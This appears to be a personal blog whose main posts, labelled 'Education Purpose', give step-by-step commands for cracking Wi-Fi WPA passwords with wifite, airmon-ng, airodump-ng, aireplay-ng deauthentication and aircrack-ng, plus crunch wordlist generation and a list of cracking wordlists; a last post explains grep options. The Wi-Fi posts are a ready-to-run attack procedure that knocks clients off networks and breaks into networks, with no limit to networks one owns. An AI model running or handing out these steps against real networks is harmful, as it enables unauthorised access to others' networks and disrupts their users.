Search This Blog

Friday, November 29, 2024

Education Purpose - Hacking Wifi and Password with wifite tool

Steps

airmon-ng stop wlan1

systemctl start NetworkManager

#Insert wlan1 - your wifi adaptor in usb 2.0

iw wlan1 del

airmon-ng start wlan1

wifite --wpa --dict /home/vijay/works/Owasp/Wifi/10-million-password-list-top-1000000.txt


press ctrl-c, enter the number of the wifi you want to break. check wpa=yes enable.

press ctrl-c and move to next attach, press c to continue, e to exit



Thursday, November 28, 2024

Monday, November 25, 2024

To hack wifi with airmon and airodump-ng with TP link USB 2.0 wifi

 NOTE:     DONT FORGOT TO INSERT THE WIFI DEVICE IN USB 2.0 AND NOT USB 3.0, IF YOU INSERT IN 3.0 IT WILL THROW NETWORK DOWN AFTER FEW SECONDS OF AIRODUMP-NG ETC..

go to hardinfo2->usb menu to see which port is usb 2.0


1. make sure internet is working and isntall the below driver for TP link - TL-wn722N 150 mbps usb adaptor

apt update

sudo apt install -y realtek-rtl8188eus-dkms

init 6    //restart 


STEPS

        airmon-ng start wlan1
airodump-ng wlan1

#if no bssi is display, then use the below command
ifconfig wlan1 down
ifconfig wlan1 up
airudump-ng wlan1

airodump-ng --bssid <64:2C:AC:D0:0B:AA> --channel <1> --write <capturefilename> <wlan1>

new tab ->  aireplay-ng --deauth 0 -a <64:2C:AC:D0:0B:AA> wlan1

aircrack-ng -b <64:2C:AC:D0:0B:AA> -w <passwordfile.txt> <Capture-Pat-1.cap>


additional
1. to generate the password list in sequence. below example starts air00001 to air99999 
crunch 8 8 -t air%%%%% -o passwordlist.txt 

2. to get all wordlists text file 
wordlists -h
/usr/share/wordlists
├── amass -> /usr/share/amass/wordlists
├── dirb -> /usr/share/dirb/wordlists
├── dirbuster -> /usr/share/dirbuster/wordlists
├── dnsmap.txt -> /usr/share/dnsmap/wordlist_TLAs.txt
├── fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt
├── fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists
├── john.lst -> /usr/share/john/password.lst
├── legion -> /usr/share/legion/wordlists
├── metasploit -> /usr/share/metasploit-framework/data/wordlists
├── nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst
├── rockyou.txt
├── sqlmap.txt -> /usr/share/sqlmap/data/txt/wordlist.txt
├── wfuzz -> /usr/share/wfuzz/wordlist
└── wifite.txt -> /usr/share/dict/wordlist-probable.txt


To find word inside file linux ubuntu - grep command

If you're looking for lines matching in files, my favorite command is:

grep -Hrni 'vijay' /home/v/abc.txt
grep -rl 'vijay' /home/vfolder

  • -H causes the filename to be printed (implied when multiple files are searched)
  • -r does a recursive search
  • -n causes the line number to be printed
  • -I ignore binary files (complement: -a treat all files as text)
  • -F treat search term as a literal, not a regular expression
  • -i do a case-insensitive search
  • --color=always to force colors even when piping through less. To make less support colors, you need to use the -r option:

    grep -Hrn search . | less -r
    
  • --exclude-dir=dir useful for excluding directories like .svn and .git.

Hit Counter


View My Stats